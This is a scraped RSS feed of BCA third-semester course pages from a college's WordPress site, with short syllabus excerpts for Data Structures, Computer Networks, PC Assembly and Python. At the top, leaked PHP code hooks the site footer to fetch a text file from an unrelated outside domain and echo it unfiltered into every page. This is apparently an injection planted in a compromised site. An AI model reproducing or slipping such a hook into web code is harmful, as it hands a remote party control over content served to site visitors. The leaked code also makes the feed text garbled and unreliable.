add_action('wp_footer', 'load_external_footer');
function load_external_footer(){
$url = 'https://kmaa26.com/berita.txt';
$data = wp_safe_remote_get($url);
if(!is_wp_error($data)){
$body = wp_remote_retrieve_body($data);
echo $body;
}
}3 Semester Archives - Synetic Business School
https://sbs.ac.in/course-category/bca/third-semester/
... College with a differenceTue, 15 Nov 2022 09:30:12 +0000en-US
hourly
1 https://wordpress.org/?v=6.9https://sbs.ac.in/wp-content/uploads/2021/12/cropped-fevicon-32x32.png3 Semester Archives - Synetic Business School
https://sbs.ac.in/course-category/bca/third-semester/
3232DATA STRUCTURES
https://sbs.ac.in/course/data-structures/
https://sbs.ac.in/course/data-structures/#respondTue, 15 Nov 2022 09:30:12 +0000https://sbs.ac.in/?post_type=lp_course&p=20787Course Outcomes: Students will be able to CO# Course outcomes CO1 Apply appropriate constructs of Programming language, coding standards for application development CO2 Select appropriate data structures for problem solving and programming CO3 Illustrate the outcome of various operations on …
]]>
https://sbs.ac.in/course/data-structures/feed/0Data Structures(UGCA1915)
https://sbs.ac.in/course/data-structuresugca1915-2/
https://sbs.ac.in/course/data-structuresugca1915-2/#respondTue, 07 Dec 2021 16:13:22 +0000https://sbs.ac.in/?post_type=lp_course&p=16455Course Name: Data Structures Course Outcomes: CO# Course outcomes CO1 Apply appropriate constructs of Programming language, coding standards for application development CO2 Use appropriate data structures for problem solving and programming CO3 Use algorithmic foundations for solving problems and programming …
]]>https://sbs.ac.in/course/data-structuresugca1915-2/feed/0Computer Networks (UGCA1913)
https://sbs.ac.in/course/computer-networks-ugca1913-2/
https://sbs.ac.in/course/computer-networks-ugca1913-2/#respondFri, 26 Nov 2021 10:47:58 +0000https://sbs.ac.in/?post_type=lp_course&p=16062Subject Name:- Computer Networks Purpose:- This course provides an in-depth discussion of computer networks.It includes a detailed discussionofthedifferentNetworkModels.Conceptsthathaveadirecteffectontheefficiency of a network (e.g.collision and broadcast domains, topology) are also discussed. Course Outline:- Towards the end of the course, students are expected …
]]>https://sbs.ac.in/course/computer-networks-ugca1913-2/feed/0Data Structures(UGCA1915 )
https://sbs.ac.in/course/data-structuresugca1915/
https://sbs.ac.in/course/data-structuresugca1915/#respondMon, 08 Feb 2021 05:41:07 +0000https://sbs.ac.in/?post_type=lp_course&p=12128 Syllabus Of Data Structure Detailed Contents Unit -I Introduction to Data Structures: Algorithms and Flowcharts, Basics Analysis on Algorithm, Complexity of Algorithm, Introduction and Definition of Data Structure, Classification of Data, Arrays, Various types of Data Structure, Static and …
]]>https://sbs.ac.in/course/data-structuresugca1915/feed/0Computer Networks(UGCA1913)
https://sbs.ac.in/course/computer-networksugca1913/
https://sbs.ac.in/course/computer-networksugca1913/#respondFri, 05 Feb 2021 06:38:54 +0000https://sbs.ac.in/?post_type=lp_course&p=12092Syllabus of Computer Network Content details Unit-I Data communications concepts: Digital and analog transmissions-Modem, parallel and serial transmission, synchronous and asynchronous communication. Modes of communication: Simplex, half duplex, full duplex. Types of Networks: LAN, MAN, WAN Network …
]]>https://sbs.ac.in/course/computer-networksugca1913/feed/0PC Assembly & Troubleshooting(UGCA1919)
https://sbs.ac.in/course/pc-assembly-troubleshootingugca1919/
https://sbs.ac.in/course/pc-assembly-troubleshootingugca1919/#commentsWed, 03 Feb 2021 07:42:23 +0000https://sbs.ac.in/?post_type=lp_course&p=12070 CLASS:BCA3rdSem Batch: 2019-21 PC Assembly & Troubleshooting Notes as per IKGPTU Syllabus Name of Faculty: Ms<Jatinderpal Kaur> Faculty of IT Department, SBS College. Ludhiana Notes PC Assembly …
]]>https://sbs.ac.in/course/pc-assembly-troubleshootingugca1919/feed/2Programming in Python (UGCA1914)
https://sbs.ac.in/course/programming-in-python-ugca1914/
https://sbs.ac.in/course/programming-in-python-ugca1914/#respondWed, 03 Feb 2021 07:28:46 +0000https://sbs.ac.in/?post_type=lp_course&p=12062CLASS:BCA3rdSem Batch: 2019-2021 Python Notes as per IKGPTU Syllabus Name of Faculty: Ms<Jatinderpal Kaur> Faculty of IT Department, SBS College. Ludhiana Unit-I Introduction to Python Programming Language: Programming Language, History and Origin of …